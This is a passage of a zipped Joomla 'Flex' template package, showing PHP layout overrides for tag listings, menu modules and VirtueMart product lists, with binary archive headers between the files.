		<?php if ($this->params->get('show_description_image', 1) == 1 && $this->params->get('tag_list_image')) : ?>
			<img src="<?php echo $this->params->get('tag_list_image'); ?>">
		<?php endif; ?>
		<?php if ($this->params->get('tag_list_description', '') > '') : ?>
			<?php echo JHtml::_('content.prepare', $this->params->get('tag_list_description'), '', 'com_tags.tag'); ?>
		<?php endif; ?>

	<?php endif; ?>

	<?php echo $this->loadTemplate('items'); ?>
	<?php if (($this->params->def('show_pagination', 1) == 1 || ($this->params->get('show_pagination') == 2)) && ($this->pagination->get('pages.total') > 1)) : ?>
		<div class="pagination">
			<?php if ($this->params->def('show_pagination_results', 1)) : ?>
				<p class="counter pull-right"> <?php echo $this->pagination->getPagesCounter(); ?> </p>
			<?php endif; ?>
			<?php echo $this->pagination->getPagesLinks(); ?>
		</div>
	<?php endif; ?>
</div>
PK!�����(flex/html/com_tags/tag/default_items.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_tags
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');

JHtml::_('behavior.core');
JHtml::_('formbehavior.chosen', 'select');

// Include template's params
$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
$has_lazyload = $tpl_params->get('lazyload', 1);

// Get the user object.
$user = JFactory::getUser();

// Check if user is allowed to add/edit based on tags permissions.
// Do we really have to make it so people can see unpublished tags???
$canEdit = $user->authorise('core.edit', 'com_tags');
$canCreate = $user->authorise('core.create', 'com_tags');
$canEditState = $user->authorise('core.edit.state', 'com_tags');
$items = $this->items;
$n = count($this->items);

?>

<form action="<?php echo htmlspecialchars(JUri::getInstance()->toString()); ?>" method="post" name="adminForm" id="adminForm" class="form-inline">
	<?php if ($this->params->get('show_headings') || $this->params->get('filter_field') || $this->params->get('show_pagination_limit')) : ?>
	<fieldset class="filters btn-toolbar">
		<?php if ($this->params->get('filter_field')) :?>
			<div class="btn-group">
				<label class="filter-search-lbl element-invisible" for="filter-search">
					<?php echo JText::_('COM_TAGS_TITLE_FILTER_LABEL') . '&#160;'; ?>
				</label>
				<input type="text" name="filter-search" id="filter-search" value="<?php echo $this->escape($this->state->get('list.filter')); ?>" class="inputbox" onchange="document.adminForm.submit();" title="<?php echo JText::_('COM_TAGS_FILTER_SEARCH_DESC'); ?>" placeholder="<?php echo JText::_('COM_TAGS_TITLE_FILTER_LABEL'); ?>" />
			</div>
		<?php endif; ?>
		<?php if ($this->params->get('show_pagination_limit')) : ?>
			<div class="btn-group pull-right">
				<label for="limit" class="element-invisible">
					<?php echo JText::_('JGLOBAL_DISPLAY_NUM'); ?>
				</label>
				<?php echo $this->pagination->getLimitBox(); ?>
			</div>
		<?php endif; ?>

		<input type="hidden" name="filter_order" value="" />
		<input type="hidden" name="filter_order_Dir" value="" />
		<input type="hidden" name="limitstart" value="" />
		<input type="hidden" name="task" value="" />
		<div class="clearfix"></div>
	</fieldset>
	<?php endif; ?>

	<?php if ($this->items == false || $n == 0) : ?>
		<p> <?php echo JText::_('COM_TAGS_NO_ITEMS'); ?></p>
	<?php else : ?>

	<ul class="category list-striped">
		<?php foreach ($items as $i => $item) : ?>
			<?php if ($item->core_state == 0) : ?>
				<li class="system-unpublished cat-list-row-<?php echo $i % 2; ?>">
			<?php else: ?>
				<li class="cat-list-row-<?php echo $i % 2; ?> clearfix" >
                <div class="sp-module">
                <h3 class="sp-module-title">
					<a href="<?php echo JRoute::_(TagsHelperRoute::getItemRoute($item->content_item_id, $item->core_alias, $item->core_catid, $item->core_language, $item->type_alias, $item->router)); ?>">
						<?php echo $this->escape($item->core_title); ?>
					</a>
                <div class="divider"></div>
				</h3><div class="divider"></div>
                </div>
			<?php endif; ?>
			<?php echo $item->event->afterDisplayTitle; ?>
			<?php $images  = json_decode($item->core_images);?>
			<?php if ($this->params->get('tag_list_show_item_image', 1) == 1 && !empty($images->image_intro)) :?>
				<a class="tag-img pull-left" href="<?php echo JRoute::_(TagsHelperRoute::getItemRoute($item->content_item_id, $item->core_alias, $item->core_catid, $item->core_language, $item->type_alias, $item->router)); ?>">
				<div class="overlay">
                <?php 
				if(strpos($images->image_intro, 'http://') !== false || strpos($images->image_intro, 'https://') !== false){
					if($has_lazyload) { ?>
						<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="<?php echo $images->image_intro; ?>" alt="<?php echo htmlspecialchars($images->image_intro_alt); ?>" data-expand="-10">
					<?php } else { ?>
						<img src="<?php echo htmlspecialchars($images->image_intro);?>" alt="<?php echo htmlspecialchars($images->image_intro_alt); ?>">
					<?php } 
					} else { 
					if($has_lazyload) { ?>
						<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="<?php echo JUri::root() . $images->image_intro; ?>" alt="<?php echo htmlspecialchars($images->image_intro_alt); ?>" data-expand="-10">
					<?php } else { ?>
						<img src="<?php echo htmlspecialchars($images->image_intro);?>" alt="<?php echo htmlspecialchars($images->image_intro_alt); ?>">
					<?php }
				} ?>
                	<i class="fa fa-link"></i>
                </div>
                </a>   
			<?php endif; ?>
			<?php if ($this->params->get('tag_list_show_item_description', 1)) : ?>
				<?php echo $item->event->beforeDisplayContent; ?>
				<span class="tag-body">
					<?php echo JHtml::_('string.truncate', $item->core_body, $this->params->get('tag_list_item_maximum_characters')); ?>
				</span>
				<?php echo $item->event->afterDisplayContent; ?>
			<?php endif; ?>
				</li>    
           <?php if ($n > 1 && $this->params->get('tag_list_show_item_image', 1) == 1 || $this->params->get('tag_list_show_item_description', 1) ) { ?>
            <div style="height:40px;width:100%;clear:both;"></div>
            <?php } ?>    
		<?php endforeach; ?>
	</ul>

	<?php endif; ?>
</form>
PK!M�j��&flex/html/mod_tags_popular/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_tags_popular
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JLoader::register('TagsHelperRoute', JPATH_BASE . '/components/com_tags/helpers/route.php'); ?>

<div class="tagspopular<?php echo $moduleclass_sfx; ?>">
<?php if (!count($list)) : ?>
	<div class="alert alert-warning"><?php echo JText::_('MOD_TAGS_POPULAR_NO_ITEMS_FOUND'); ?></div>
<?php else : ?>
	<ul>
	<?php foreach ($list as $item) : ?>
	<li><?php $route = new TagsHelperRoute; ?>
		<a href="<?php echo JRoute::_(TagsHelperRoute::getTagRoute($item->tag_id . '-' . $item->alias)); ?>">
			<?php echo htmlspecialchars($item->title); ?>
			<?php if ($display_count) : ?>
				<span class="tag-count badge badge-info"><?php echo $item->count; ?></span>
			<?php endif; ?>
		</a>
	</li>
	<?php endforeach; ?>
	</ul>
<?php endif; ?>
</div>
PK!pC���$flex/html/mod_tags_popular/cloud.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_tags_popular
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JLoader::register('TagsHelperRoute', JPATH_BASE . '/components/com_tags/helpers/route.php');
?>
<div class="tagspopular<?php echo $moduleclass_sfx; ?> tagscloud<?php echo $moduleclass_sfx; ?>">
<?php
if (!count($list)) : ?>
	<div class="alert alert-warning"><?php echo JText::_('MOD_TAGS_POPULAR_NO_ITEMS_FOUND'); ?></div>
<?php else :
	foreach ($list as $item) :?>
		<a class="tag-name" href="<?php echo JRoute::_(TagsHelperRoute::getTagRoute($item->tag_id . ':' . $item->alias)); ?>">
			<?php echo htmlspecialchars($item->title); ?>
			<?php if ($display_count) : ?>
				<span><?php echo $item->count; ?></span>
			<?php endif; ?>
		</a>	
	<?php endforeach; ?>
<?php endif; ?>
</div>
PK!�J'���(flex/html/mod_menu/default_component.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_menu
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// get item params and decode it
$item_decode = json_decode($item->params);

// Note. It is important to remove spaces between elements.
$class = $item->anchor_css ? 'class="' . $item->anchor_css . '" ' : '';
$title = $item->anchor_title ? 'title="' . $item->anchor_title . '" ' : '';

if ($item->menu_image) {
	$item->params->get('menu_text', 1) ?
	$linktype = '<img src="' . $item->menu_image . '" alt="' . $item->title . '" /><span class="image-title">' . $item->title . '</span> ' :
	$linktype = '<img src="' . $item->menu_image . '" alt="' . $item->title . '" />';
} else {
	$linktype = $item->title;
}

$icon = '';

//Add Menu Pixeden Icon (for Flex)
if (isset($item_decode->peicon) && $item_decode->peicon) {
	$icon = ' <i class="pe ' . $item_decode->peicon . '"></i>';
} else {
	// FontAwesome icon
	
	if (isset($item_decode->icon) && $item_decode->icon) {
		
		if(strpos($item_decode->icon, "fab") !== false || strpos($item_decode->icon, "fas") !== false || strpos($item_decode->icon, "far") !== false) {
			// FontAwesome 5
			$fa_icon = str_replace("fa ", "", $item_decode->icon);
		} else {
			// FontAwesome 4
			$fa_icon = 'fa ' . $item_decode->icon;
		}
		
		$icon = ' <i class="' . $fa_icon . '"></i>';
	}
	
}


$flink = $item->flink;
$flink = JFilterOutput::ampReplace(htmlspecialchars($flink));

switch ($item->browserNav) {
	default:
	case 0:
?><a <?php echo $class; ?>href="<?php echo $flink; ?>" <?php echo $title; ?>><?php echo $icon . ' ' . $linktype; ?></a><?php
		break;
	case 1:
		// _blank
?><a <?php echo $class; ?>href="<?php echo $flink; ?>" target="_blank" <?php echo $title; ?>><?php echo $icon . ' ' .$linktype; ?></a><?php
		break;
	case 2:
	// Use JavaScript "window.open"
?><a <?php echo $class; ?>href="<?php echo $flink; ?>" onclick="window.open(this.href,'targetWindow','toolbar=no,location=no,status=no,menubar=no,scrollbars=yes,resizable=yes');return false;" <?php echo $title; ?>><?php echo $icon . ' ' .$linktype; ?></a>
<?php
		break;
}

PK!���&flex/html/mod_menu/default_heading.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_menu
 *
 * @copyright   Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$title      = $item->anchor_title ? ' title="' . $item->anchor_title . '"' : '';
$anchor_css = $item->anchor_css ? $anchor_css = ' '.$item->anchor_css : '';

$linktype   = $item->title;

if ($item->menu_image)
{
	$linktype = JHtml::_('image', $item->menu_image, $item->title);

	if ($item->params->get('menu_text', 1))
	{
		$linktype .= '<span class="image-title">' . $item->title . '</span>';
	}
}

?>
<span class="nav-header separator<?php echo $anchor_css; ?>"<?php echo $title; ?>><?php echo $linktype; ?></span>
PK!�p��(flex/html/mod_menu/default_separator.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_menu
 *
 * @copyright   Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$title      = $item->anchor_title ? ' title="' . $item->anchor_title . '"' : '';
$anchor_css = $item->anchor_css ? $anchor_css = ' '.$item->anchor_css : '';

$linktype   = $item->title;

if ($item->menu_image)
{
	$linktype = JHtml::_('image', $item->menu_image, $item->title);

	if ($item->params->get('menu_text', 1))
	{
		$linktype .= '<span class="image-title">' . $item->title . '</span>';
	}
}
?>
<span class="separator<?php echo $anchor_css; ?>"<?php echo $title; ?>><?php echo $linktype; ?></span>
PK!���Nq
q
*flex/html/mod_menu/accordion_component.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('_JEXEC') or die;

// get item params and decode it
$item_decode = json_decode($item->params);

// Note. It is important to remove spaces between elements.
if ($item->anchor_css != 'hidden') {
	$class = $item->anchor_css ? 'class="' . $item->anchor_css . '" ' : '';
} else {
	$class = '';
}


$title = $item->anchor_title ? 'title="' . $item->anchor_title . '" ' : '';

if ($item->menu_image) {
	$item->params->get('menu_text', 1) ?
	$linktype = '<img src="' . $item->menu_image . '" alt="' . $item->title . '" /><span class="image-title">' . $item->title . '</span> ' :
	$linktype = '<img src="' . $item->menu_image . '" alt="' . $item->title . '" />';
} else {
	$linktype = $item->title;
}

$icon = '';
	
//Add Menu Pixeden Icon (for Flex)
if (isset($item_decode->peicon) && $item_decode->peicon) {
	$icon = ' <i class="pe ' . $item_decode->peicon . '"></i>';
} else {
	// FontAwesome icon
	
	if (isset($item_decode->icon) && $item_decode->icon) {
		
		if(strpos($item_decode->icon, "fab") !== false || strpos($item_decode->icon, "fas") !== false || strpos($item_decode->icon, "far") !== false) {
			// FontAwesome 5
			$fa_icon = str_replace("fa ", "", $item_decode->icon);
		} else {
			// FontAwesome 4
			$fa_icon = 'fa ' . $item_decode->icon;
		}
		
		$icon = ' <i class="' . $fa_icon . '"></i>';
	}
	
}

$flink = $item->flink;
$flink = JFilterOutput::ampReplace(htmlspecialchars($flink));

switch ($item->browserNav) {
	default:
	case 0:
?><a <?php echo $class; ?>href="<?php echo $flink; ?>" <?php echo $title; ?>><?php echo $icon . ' ' . $linktype; ?></a><?php
		break;
	case 1:
		// _blank
?><a <?php echo $class; ?>href="<?php echo $flink; ?>" target="_blank" <?php echo $title; ?>><?php echo $icon . ' ' .$linktype; ?></a><?php
		break;
	case 2:
	// Use JavaScript "window.open"
?><a <?php echo $class; ?>href="<?php echo $flink; ?>" onclick="window.open(this.href,'targetWindow','toolbar=no,location=no,status=no,menubar=no,scrollbars=yes,resizable=yes');return false;" <?php echo $title; ?>><?php echo $icon . ' ' .$linktype; ?></a>
<?php
		break;
}

		if ($active_collapse != '') {
		   $collapsed = ' active-open';
		} else {
			$collapsed = ' collapsed';
		}

//if(($module->position == 'offcanvas') && ($item->deeper)) {
if($item->deeper) {
		echo '<span class="accordion-menu-toggler' . $collapsed . '" data-toggle="collapse" data-target="#collapse-menu-'. $item->id .'-'.$randomid.'"><i class="open-icon fas fa-chevron-down"></i></span>';	
} PK!B���� flex/html/mod_menu/accordion.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('_JEXEC') or die;

//random ID number to avoid conflict if there is more modules on the same page
$randomid = rand(1,1000);
?>
<ul class="accordion-menu <?php echo $class_sfx;?>"<?php
	$tag = '';

	if ($params->get('tag_id') != null)
	{
		$tag = $params->get('tag_id') . '';
		echo ' id="' . $tag . '"';
	}
?>>
<?php
foreach ($list as $i => &$item) {
	$class = 'item-' . $item->id;
	$active_collapse = '';

	if (($item->id == $active_id) OR ($item->type == 'alias' AND $item->params->get('aliasoptions') == $active_id))
	{
		$class .= ' current';
	}

	if (in_array($item->id, $path))
	{
		$class .= ' active';
		$active_collapse .= ' in';
	}
	elseif ($item->type == 'alias')
	{
		$aliasToId = $item->params->get('aliasoptions');

		if (count($path) > 0 && $aliasToId == $path[count($path) - 1])
		{
			$class .= ' active';
		}
		elseif (in_array($aliasToId, $path))
		{
			$class .= ' alias-parent-active';
		}
	}

	if ($item->type == 'separator') { 
		$class .= ' divider-separator'; 
	}
	
	if ($item->type == 'heading') { 
		$class .= ' separator';
	}

	if ($item->deeper) {
		$class .= ' deeper';
	}

	if ($item->parent)
	{
		$class .= ' parent';
	}

	if (!empty($class))
	{
		$class = ' class="' . trim($class) . '"';
	}

	echo '<li' . $class . '>';

	// Render the menu item.
	switch ($item->type) :
		case 'separator':
		case 'url':
		case 'component':
		case 'heading':
			require JModuleHelper::getLayoutPath('mod_menu', 'accordion_component');
			break;

		default:
			require JModuleHelper::getLayoutPath('mod_menu', 'accordion_url');
			break;
	endswitch;

	// The next item is deeper.
	if ($item->deeper)
	{
		//if($module->position == 'offcanvas') {
			//echo '<ul class="collapse" id="collapse-menu-'. $item->id .'">';
		//} else {
			echo '<ul class="collapse' . $active_collapse . '" id="collapse-menu-'. $item->id .'-'.$randomid.'">';
		//}
		
	}
	elseif ($item->shallower)
	{
		// The next item is shallower.
		echo '</li>';
		echo str_repeat('</ul></li>', $item->level_diff);
	}
	else
	{
		// The next item is on the same level.
		echo '</li>';
	}
}
?></ul>
PK!��[��$flex/html/mod_menu/accordion_url.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('_JEXEC') or die;

// Note. It is important to remove spaces between elements.
$class = $item->anchor_css ? 'class="' . $item->anchor_css . '" ' : '';
$title = $item->anchor_title ? 'title="' . $item->anchor_title . '" ' : '';
$icon = '';

if ($item->menu_image)
{
	$item->params->get('menu_text', 1) ?
	$linktype = '<img src="' . $item->menu_image . '" alt="' . $item->title . '" /><span class="image-title">' . $item->title . '</span> ' :
	$linktype = '<img src="' . $item->menu_image . '" alt="' . $item->title . '" />';
}
else
{
	$linktype = $item->title;
}

$flink = $item->flink;
$flink = JFilterOutput::ampReplace(htmlspecialchars($flink));

switch ($item->browserNav) :
	default:
	case 0:
		$link_rel = ($item->anchor_rel) ? 'rel="' . $item->anchor_rel . '"' : '' ;
		?>
		<a <?php echo $class; ?> href="<?php echo $flink; ?>" <?php echo $title; ?> <?php echo $link_rel ?>><?php echo $icon . ' ' . $linktype; ?></a><?php
	break;
	case 1:
		// _blank
		$link_rel = ($item->anchor_rel == 'nofollow') ? 'noopener noreferrer nofollow' : 'noopener noreferrer';
		?>
		<a <?php echo $class; ?>href="<?php echo $flink; ?>" rel="<?php echo $link_rel ?>" target="_blank" <?php echo $title; ?>><?php echo $icon . ' ' . $linktype; ?></a><?php
	break;
	case 2:
		// Use JavaScript "window.open"
		$options = 'toolbar=no,location=no,status=no,menubar=no,scrollbars=yes,resizable=yes,' . $params->get('window_open');
			?><a <?php echo $class; ?>href="<?php echo $flink; ?>" onclick="window.open(this.href,'targetWindow','<?php echo $options;?>');return false;" <?php echo $title; ?>><?php echo $icon . ' ' . $linktype; ?></a><?php
	break;
endswitch;

		if ($active_collapse != '') {
		   $collapsed = ' active-open';
		} else {
			$collapsed = ' collapsed';
		}

if($item->deeper) {
		echo '<span class="accordion-menu-toggler' . $collapsed . '" data-toggle="collapse" data-target="#collapse-menu-'. $item->id .'-'.$randomid.'"><i class="open-icon fas fa-chevron-down"></i></span>';	
} PK!��4��"flex/html/mod_menu/default_url.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_menu
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// get item params and decode it
$item_decode = json_decode($item->params);

// Note. It is important to remove spaces between elements.
$class = $item->anchor_css ? 'class="' . $item->anchor_css . '" ' : '';
$title = $item->anchor_title ? 'title="' . $item->anchor_title . '" ' : '';

if ($item->menu_image)
{
	$item->params->get('menu_text', 1) ?
	$linktype = '<img src="' . $item->menu_image . '" alt="' . $item->title . '" /><span class="image-title">' . $item->title . '</span> ' :
	$linktype = '<img src="' . $item->menu_image . '" alt="' . $item->title . '" />';
}
else
{
	$linktype = $item->title;
}

$icon = '';
//Add Menu Pixeden Icon (for Flex)
if (isset($item_decode->peicon) && $item_decode->peicon) {
	$icon = ' <i class="pe ' . $item_decode->peicon . '"></i>';
} else {
	if (isset($item_decode->icon) && $item_decode->icon) {
		$icon = ' <i class="fa ' . $item_decode->icon . '"></i>';
	}
	
}

$flink = $item->flink;
$flink = JFilterOutput::ampReplace(htmlspecialchars($flink));

switch ($item->browserNav) :
	default:
	case 0:
		$link_rel = ($item->anchor_rel) ? 'rel="' . $item->anchor_rel . '"' : '' ;
		?>
		<a <?php echo $class; ?> href="<?php echo $flink; ?>" <?php echo $title; ?> <?php echo $link_rel ?>><?php echo $icon . ' ' . $linktype; ?></a><?php
	break;
	case 1:
		// _blank
		$link_rel = ($item->anchor_rel == 'nofollow') ? 'noopener noreferrer nofollow' : 'noopener noreferrer';
		?>
		<a <?php echo $class; ?>href="<?php echo $flink; ?>" rel="<?php echo $link_rel ?>" target="_blank" <?php echo $title; ?>><?php echo $icon . ' ' . $linktype; ?></a><?php
	break;
	case 2:
		// Use JavaScript "window.open"
		$options = 'toolbar=no,location=no,status=no,menubar=no,scrollbars=yes,resizable=yes,' . $params->get('window_open');
			?><a <?php echo $class; ?>href="<?php echo $flink; ?>" onclick="window.open(this.href,'targetWindow','<?php echo $options;?>');return false;" <?php echo $title; ?>><?php echo $icon . ' ' . $linktype; ?></a><?php
	break;
endswitch;
PK!9�.���)flex/html/mod_virtuemart_product/list.phpnu&1i�<?php // no direct access
defined ('_JEXEC') or die('Restricted access');
// add javascript for price and cart, need even for quantity buttons, so we need it almost anywhere
vmJsApi::jPrice();


$col = 1;
$pwidth = ' width' . floor (100 / $products_per_row);
if ($products_per_row > 1) {
	$float = "floatleft";
} else {
	$float = "center";
}
if ($products_per_row == 1) {
	$col_sm = '12';
} else if ($products_per_row > 3) {
	$col_sm = '4';
} else {
	$col_sm = '6';
}
?>
<?php if ($display_style == "div") { ?>
<div class="featured-view <?php echo $params->get ('moduleclass_sfx') ?>">
<?php } else { ?>
<div class="vmgroup listview clearfix <?php echo $params->get ('moduleclass_sfx') ?>">
<?php } ?>

	<?php if ($headerText) { ?>
	<div class="vmheader"><?php echo $headerText ?></div>
	<?php
}
	if ($display_style == "div") {
		?>
		<div class="row productwrap vmproduct<?php echo $params->get ('moduleclass_sfx'); ?> productdetails">
			<?php foreach ($products as $product) { ?>
			<div class="products product-list-style col-sm-<?php echo $col_sm; ?> col-md-<?php echo round(12/$products_per_row) ?> <?php echo $float ?>">
				<div class="spacer center">
					<div class="spacer-img">
					<?php
					if (!empty($product->images[0])) {
						$image = $product->images[0]->displayMediaThumb ('class="featuredProductImage" border="0"', FALSE);
					} else {
						$image = '';
					}
					echo JHTML::_ ('link', JRoute::_ ('index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=' . $product->virtuemart_product_id . '&virtuemart_category_id=' . $product->virtuemart_category_id), $image, array('title' => $product->product_name));
					echo '</div>';
					
					$url = JRoute::_ ('index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=' . $product->virtuemart_product_id . '&virtuemart_category_id=' .
						$product->virtuemart_category_id); ?>
					<div class="spacer-inner">	
                  <h2><a href="<?php echo $url ?>"><?php echo $product->product_name ?></a></h2>
					<?php if ($show_price) {  ?>
						<?php if (!empty($product->prices['salesPrice'])) {
							echo $currency->createPriceDiv ('salesPrice', '', $product->prices, FALSE, FALSE, 1.0, TRUE);
						}
					
						if (!empty($product->prices['salesPriceWithDiscount'])) {
							echo $currency->createPriceDiv ('salesPriceWithDiscount', '', $product->prices, FALSE, FALSE, 1.0, TRUE);
						}
					} ?>
				
					<?php if ($show_addtocart) {  ?>
						<hr /><div class="clear"></div>
					<?php echo shopFunctionsF::renderVmSubLayout('addtocart',array('product'=>$product)); ?>
					<div class="clear"></div>
                    
					<?php } ?>
                   </div> <!--spacer-inner-->
			    </div>
			</div>
			<?php
			if ($col == $products_per_row && $products_per_row && $col < $totalProd) {
				//echo "	</div><div style='clear:both;'>";
				$col = 1;
			} else {
				$col++;
			}
		} ?>
		</div>
		<div class="clear"></div>

		<?php
	} else {
		$last = count ($products) - 1;
		?>

		<ul class="vm-product<?php echo $params->get ('moduleclass_sfx'); ?> productdetails">
			<?php foreach ($products as $product) : ?>
			<li class="col-sm-<?php echo $col_sm; ?> col-md-<?php echo round(12/$products_per_row) ?> <?php echo $float ?>">
			
				<div class="spacer-img">
				<?php
				if (!empty($product->images[0])) {
					$image = $product->images[0]->displayMediaThumb ('class="featuredProductImage" border="0"', FALSE);
				} else {
					$image = '';
				}
				echo JHTML::_ ('link', JRoute::_ ('index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=' . $product->virtuemart_product_id . '&virtuemart_category_id=' . $product->virtuemart_category_id), $image, array('title' => $product->product_name));
				echo '</div>';
				
				$url = JRoute::_ ('index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=' . $product->virtuemart_product_id . '&virtuemart_category_id=' .
					$product->virtuemart_category_id); ?>
				<div class="spacer-inner">		
					<h5><a href="<?php echo $url ?>"><?php echo $product->product_name ?></a></h5>
                    <?php 
					if ($show_price and isset($product->prices)) {
						echo '<h4 class="product-price">'.$currency->createPriceDiv ('salesPrice', '', $product->prices, FALSE, FALSE, 1.0, TRUE);
						if ($product->prices['salesPriceWithDiscount'] > 0) {
							echo $currency->createPriceDiv ('salesPriceWithDiscount', '', $product->prices, FALSE, FALSE, 1.0, TRUE);
						}
						echo '</h4>';
						
					}
				if ($show_addtocart) {
					echo shopFunctionsF::renderVmSubLayout('addtocart',array('product'=>$product));
				}
				echo '</div>';
				?>
				
			</li>
			<?php
			if ($col == $products_per_row && $products_per_row && $last) {
				echo '</ul>';
		       
		    echo '<ul class="vm-product' . $params->get ('moduleclass_sfx') . ' productdetails">';
				$col = 1;
			} else {
				$col++;
			}
			$last--;
		endforeach; ?>
		</ul>
		

		<?php
	}
	if ($footerText) : ?>
		<div class="vmfooter<?php echo $params->get ('moduleclass_sfx') ?>">
			<?php echo $footerText ?>
		</div>
		<?php endif; ?>
<?php
if(VmConfig::get ('jdynupdate', TRUE)){

$j = "jQuery(document).ready(function($) {
var productCustomization=$('.cd-customization'),cart=$('.cd-cart'),animating=false;initCustomization(productCustomization);$('body').on('click',function(event){if($(event.target).is('body')||$(event.target).is('.cd-gallery')){deactivateCustomization()}});function initCustomization(items){items.each(function(){var actual=$(this),addToCartBtn=actual.find('.add-to-cart'),touchSettings=actual.next('.cd-customization-trigger');addToCartBtn.on('click',function(){if(!animating){animating=true;resetCustomization(addToCartBtn);addToCartBtn.addClass('is-added').find('path').eq(0).animate({'stroke-dashoffset':0},300,function(){setTimeout(function(){updateCart();addToCartBtn.removeClass('is-added').find('.addtocart-button').on('webkitTransitionEnd otransitionend oTransitionEnd msTransitionEnd transitionend',function(){addToCartBtn.find('path').eq(0).css('stroke-dashoffset','19.79');animating=false});if($('.no-csstransitions').length>0){addToCartBtn.find('path').eq(0).css('stroke-dashoffset','19.79');animating=false}},600)})}});touchSettings.on('click',function(event){event.preventDefault();resetCustomization(addToCartBtn)})})}function resetCustomization(selectOptions){selectOptions.siblings('[data-type=\"select\"]').removeClass('is-open').end().parents('.cd-single-item').addClass('hover').parent('li').siblings('li').find('.cd-single-item').removeClass('hover').end().find('[data-type=\"select\"]').removeClass('is-open')}function deactivateCustomization(){productCustomization.parent('.cd-single-item').removeClass('hover').end().find('[data-type=\"select\"]').removeClass('is-open')}function updateCart(){(!cart.find('.total_products').hasClass('items-added'))&&cart.find('.total_products').addClass('items-added').removeClass('empty_basket');var cartItems=cart.find('span'),text=parseInt(cartItems.text())+1;cartItems.text(text)}
	
});";
vmJsApi::addJScript('vmPreloader',$j);
}
echo vmJsApi::writeJS();
?>
</div>PK!9�.���,flex/html/mod_virtuemart_product/default.phpnu&1i�<?php // no direct access
defined ('_JEXEC') or die('Restricted access');
// add javascript for price and cart, need even for quantity buttons, so we need it almost anywhere
vmJsApi::jPrice();


$col = 1;
$pwidth = ' width' . floor (100 / $products_per_row);
if ($products_per_row > 1) {
	$float = "floatleft";
} else {
	$float = "center";
}
if ($products_per_row == 1) {
	$col_sm = '12';
} else if ($products_per_row > 3) {
	$col_sm = '4';
} else {
	$col_sm = '6';
}
?>
<?php if ($display_style == "div") { ?>
<div class="featured-view <?php echo $params->get ('moduleclass_sfx') ?>">
<?php } else { ?>
<div class="vmgroup listview clearfix <?php echo $params->get ('moduleclass_sfx') ?>">
<?php } ?>

	<?php if ($headerText) { ?>
	<div class="vmheader"><?php echo $headerText ?></div>
	<?php
}
	if ($display_style == "div") {
		?>
		<div class="row productwrap vmproduct<?php echo $params->get ('moduleclass_sfx'); ?> productdetails">
			<?php foreach ($products as $product) { ?>
			<div class="products product-list-style col-sm-<?php echo $col_sm; ?> col-md-<?php echo round(12/$products_per_row) ?> <?php echo $float ?>">
				<div class="spacer center">
					<div class="spacer-img">
					<?php
					if (!empty($product->images[0])) {
						$image = $product->images[0]->displayMediaThumb ('class="featuredProductImage" border="0"', FALSE);
					} else {
						$image = '';
					}
					echo JHTML::_ ('link', JRoute::_ ('index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=' . $product->virtuemart_product_id . '&virtuemart_category_id=' . $product->virtuemart_category_id), $image, array('title' => $product->product_name));
					echo '</div>';
					
					$url = JRoute::_ ('index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=' . $product->virtuemart_product_id . '&virtuemart_category_id=' .
						$product->virtuemart_category_id); ?>
					<div class="spacer-inner">	
                  <h2><a href="<?php echo $url ?>"><?php echo $product->product_name ?></a></h2>
					<?php if ($show_price) {  ?>
						<?php if (!empty($product->prices['salesPrice'])) {
							echo $currency->createPriceDiv ('salesPrice', '', $product->prices, FALSE, FALSE, 1.0, TRUE);
						}
					
						if (!empty($product->prices['salesPriceWithDiscount'])) {
